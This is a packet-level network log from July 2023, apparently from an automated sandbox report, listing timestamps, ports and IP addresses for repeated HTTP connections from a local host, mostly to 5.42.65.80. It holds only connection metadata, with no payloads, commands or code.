Jul 27, 2023 20:19:16.550808907 CEST	80	49728	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.550879002 CEST	49728	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.632590055 CEST	49715	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:16.676835060 CEST	49728	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.677567959 CEST	49729	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.709458113 CEST	80	49729	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.709494114 CEST	80	49728	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.709606886 CEST	49729	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.709664106 CEST	49728	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.710221052 CEST	49729	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.741991997 CEST	80	49729	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.743586063 CEST	80	49729	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.743675947 CEST	49729	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.760051012 CEST	49730	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:16.760116100 CEST	443	49730	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:16.760231972 CEST	49730	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:16.806174994 CEST	49730	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:16.806214094 CEST	443	49730	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:16.854466915 CEST	49729	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.858824968 CEST	49731	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.868948936 CEST	443	49730	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:16.869141102 CEST	49730	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:16.886471987 CEST	80	49729	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.886636019 CEST	49729	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.890604973 CEST	80	49731	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.890737057 CEST	49731	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.891294003 CEST	49731	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.893430948 CEST	49730	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:16.893469095 CEST	443	49730	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:16.893907070 CEST	443	49730	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:16.894011021 CEST	49730	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:16.899411917 CEST	80	49715	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:16.899540901 CEST	49715	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:16.922969103 CEST	80	49731	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.925656080 CEST	80	49731	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:16.925848961 CEST	49731	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:16.938765049 CEST	49730	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:16.975929022 CEST	443	49730	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:16.976017952 CEST	49730	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:16.976025105 CEST	443	49730	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:16.976100922 CEST	49730	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:16.976640940 CEST	49730	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:16.976666927 CEST	443	49730	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:16.991480112 CEST	49732	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:17.044226885 CEST	49731	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.044930935 CEST	49733	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.076203108 CEST	80	49731	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.076924086 CEST	80	49733	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.077035904 CEST	49731	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.077074051 CEST	49733	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.079442024 CEST	49733	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.111495018 CEST	80	49733	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.113820076 CEST	80	49733	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.113939047 CEST	49733	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.236582041 CEST	49733	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.267863035 CEST	49734	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.268799067 CEST	80	49733	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.268913031 CEST	49733	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.272631884 CEST	80	49732	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:17.273555994 CEST	49732	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:17.274195910 CEST	49732	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:17.299422979 CEST	80	49734	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.299509048 CEST	49734	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.299972057 CEST	49734	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.331434965 CEST	80	49734	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.333404064 CEST	80	49734	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.333563089 CEST	49734	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.447886944 CEST	49734	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.448648930 CEST	49735	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.479973078 CEST	80	49734	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.480021954 CEST	80	49735	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.480389118 CEST	49734	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.480446100 CEST	49735	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.480771065 CEST	49735	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.512126923 CEST	80	49735	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.514033079 CEST	80	49735	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.514116049 CEST	49735	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.554965019 CEST	80	49732	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:17.562988043 CEST	80	49732	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:17.625646114 CEST	49735	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.626303911 CEST	49736	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.657188892 CEST	80	49735	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.657290936 CEST	49735	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.658301115 CEST	80	49736	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.658421993 CEST	49736	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.685410976 CEST	49736	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.697196007 CEST	49732	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:17.717680931 CEST	80	49736	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.719194889 CEST	80	49736	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.719274044 CEST	49736	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.827169895 CEST	49736	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.827896118 CEST	49737	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.859401941 CEST	80	49737	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.859497070 CEST	80	49736	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.859602928 CEST	49737	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.859633923 CEST	49736	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.861715078 CEST	49737	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:17.866134882 CEST	49732	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:17.866240978 CEST	49732	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:17.893541098 CEST	80	49737	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.895344019 CEST	80	49737	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:17.895498037 CEST	49737	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.013963938 CEST	49737	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.015022993 CEST	49738	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.045600891 CEST	80	49737	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.046796083 CEST	49737	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.046942949 CEST	80	49738	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.047070980 CEST	49738	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.053980112 CEST	49738	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.086694002 CEST	80	49738	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.088758945 CEST	80	49738	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.088855982 CEST	49738	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.147294044 CEST	80	49732	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:18.147320986 CEST	80	49732	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:18.162978888 CEST	80	49732	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:18.198271036 CEST	49738	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.198647976 CEST	49739	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.230052948 CEST	80	49739	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.230114937 CEST	80	49738	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.230273008 CEST	49738	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.230289936 CEST	49739	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.230714083 CEST	49739	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.262031078 CEST	80	49739	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.263823032 CEST	80	49739	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.263972044 CEST	49739	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.292922020 CEST	49732	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:18.314218998 CEST	49732	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:18.373939991 CEST	49739	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.374675035 CEST	49740	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.405678988 CEST	80	49739	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.405819893 CEST	49739	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.406316996 CEST	80	49740	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.407419920 CEST	49740	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.410445929 CEST	49740	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.442329884 CEST	80	49740	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.444292068 CEST	80	49740	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.445708036 CEST	49740	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.558228970 CEST	49740	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.559068918 CEST	49741	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.590259075 CEST	80	49740	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.590317011 CEST	80	49741	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.590465069 CEST	49740	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.590677977 CEST	49741	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.592418909 CEST	49741	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.595931053 CEST	80	49732	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:18.605946064 CEST	80	49732	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:18.625773907 CEST	80	49741	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.627547979 CEST	80	49741	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.630942106 CEST	49741	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.729635954 CEST	49741	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.730520010 CEST	49742	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.765467882 CEST	80	49742	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.765496016 CEST	80	49741	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.765614033 CEST	49742	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.766127110 CEST	49741	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.766415119 CEST	49742	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.789973974 CEST	49732	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:18.789974928 CEST	49732	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:18.797805071 CEST	80	49742	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.800646067 CEST	80	49742	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.800776005 CEST	49742	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.931420088 CEST	49742	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.936292887 CEST	49743	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.963093042 CEST	80	49742	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.963346004 CEST	49742	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.968182087 CEST	80	49743	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:18.969099998 CEST	49743	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:18.970407963 CEST	49743	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.002669096 CEST	80	49743	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.004430056 CEST	80	49743	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.004504919 CEST	49743	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.006122112 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:19.006385088 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:19.070976973 CEST	80	49732	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:19.071007967 CEST	80	49732	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:19.086951017 CEST	80	49732	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:19.119914055 CEST	49743	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.121478081 CEST	49744	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.152188063 CEST	80	49743	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.152295113 CEST	49743	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.152908087 CEST	80	49744	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.153014898 CEST	49744	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.153367996 CEST	49744	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.184710979 CEST	80	49744	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.187131882 CEST	80	49744	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.187257051 CEST	49744	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.291106939 CEST	49732	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:19.306019068 CEST	49744	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.306992054 CEST	49745	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.337657928 CEST	80	49744	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.337769985 CEST	49744	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.339222908 CEST	80	49745	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.340888023 CEST	49745	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.343384027 CEST	49745	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.375703096 CEST	80	49745	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.377424002 CEST	80	49745	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.378489971 CEST	49745	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.496886969 CEST	49745	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.498476982 CEST	49746	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.529290915 CEST	80	49745	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.529645920 CEST	49745	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.530200005 CEST	80	49746	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.530329943 CEST	49746	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.531431913 CEST	49746	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.563361883 CEST	80	49746	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.565226078 CEST	80	49746	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.565371037 CEST	49746	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.695709944 CEST	49746	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.696922064 CEST	49747	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.727793932 CEST	80	49746	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.728359938 CEST	49746	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.729413033 CEST	80	49747	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.729808092 CEST	49747	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.730190992 CEST	49747	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.762371063 CEST	80	49747	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.764108896 CEST	80	49747	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.766880989 CEST	49747	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.841736078 CEST	49732	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:19.873859882 CEST	49747	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.874625921 CEST	49748	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.886820078 CEST	49749	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:19.905955076 CEST	80	49747	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.905982018 CEST	80	49748	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.906075001 CEST	49748	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.906188965 CEST	49747	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.906557083 CEST	49748	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:19.937923908 CEST	80	49748	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.939481020 CEST	80	49748	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:19.939575911 CEST	49748	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.070756912 CEST	49748	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.071559906 CEST	49750	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.102019072 CEST	80	49748	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.102632999 CEST	49748	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.103137970 CEST	80	49750	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.103249073 CEST	49750	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.103601933 CEST	49750	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.122715950 CEST	80	49732	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:20.122811079 CEST	49732	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:20.135168076 CEST	80	49750	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.137064934 CEST	80	49750	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.137897968 CEST	49750	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.157912016 CEST	80	49749	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:20.158118010 CEST	49749	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:20.158754110 CEST	49749	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:20.245939016 CEST	49750	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.246865034 CEST	49751	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.277784109 CEST	80	49750	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.277915955 CEST	49750	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.278363943 CEST	80	49751	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.280910969 CEST	49751	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.281353951 CEST	49751	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.312849998 CEST	80	49751	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.314516068 CEST	80	49751	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.314686060 CEST	49751	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.429372072 CEST	80	49749	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:20.437237024 CEST	80	49749	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:20.453838110 CEST	49751	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.455048084 CEST	49752	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.485672951 CEST	80	49751	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.485748053 CEST	49751	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.486219883 CEST	80	49752	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.486303091 CEST	49752	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.486730099 CEST	49752	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.494285107 CEST	49749	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:20.521652937 CEST	80	49752	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.523283005 CEST	80	49752	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.523349047 CEST	49752	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.643162966 CEST	49752	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.647989988 CEST	49753	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.674521923 CEST	80	49752	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.676924944 CEST	49752	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.679585934 CEST	80	49753	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.680658102 CEST	49753	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.706124067 CEST	49753	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.737652063 CEST	80	49753	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.739130020 CEST	80	49753	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.742917061 CEST	49753	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.846776962 CEST	49749	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:20.846863031 CEST	49749	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:20.855272055 CEST	49753	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.855887890 CEST	49754	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.886970043 CEST	80	49753	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.887779951 CEST	80	49754	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.887840986 CEST	49753	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.887887001 CEST	49754	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.888287067 CEST	49754	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:20.920248032 CEST	80	49754	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.921624899 CEST	80	49754	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:20.921755075 CEST	49754	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.031667948 CEST	49754	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.034085035 CEST	49755	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.064013958 CEST	80	49754	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.064141989 CEST	49754	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.065412045 CEST	80	49755	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.068401098 CEST	49755	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.068756104 CEST	49755	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.100158930 CEST	80	49755	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.101905107 CEST	80	49755	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.103111982 CEST	49755	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.117777109 CEST	80	49749	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:21.117815018 CEST	80	49749	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:21.130661964 CEST	80	49749	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:21.181862116 CEST	49749	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:21.201343060 CEST	49749	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:21.225483894 CEST	49755	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.226703882 CEST	49756	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.256943941 CEST	80	49755	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.257071972 CEST	49755	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.258276939 CEST	80	49756	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.258399963 CEST	49756	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.258889914 CEST	49756	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.290674925 CEST	80	49756	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.291805029 CEST	80	49756	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.291910887 CEST	49756	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.404762030 CEST	49756	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.405459881 CEST	49757	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.436532974 CEST	80	49756	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.436639071 CEST	49756	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.437299967 CEST	80	49757	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.438293934 CEST	49757	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.438662052 CEST	49757	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.470549107 CEST	80	49757	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.472074986 CEST	80	49749	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:21.472157001 CEST	80	49757	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.472316980 CEST	49757	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.483242035 CEST	80	49749	154.221.26.108	192.168.2.4
Jul 27, 2023 20:19:21.525618076 CEST	49749	80	192.168.2.4	154.221.26.108
Jul 27, 2023 20:19:21.589579105 CEST	49757	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.598372936 CEST	49758	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.621896982 CEST	80	49757	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.623375893 CEST	49757	80	192.168.2.4	5.42.65.80
Jul 27, 2023 20:19:21.630100012 CEST	80	49758	5.42.65.80	192.168.2.4
Jul 27, 2023 20:19:21.630225897 CEST	49758	80	192.168.2.4	5.42.65.80
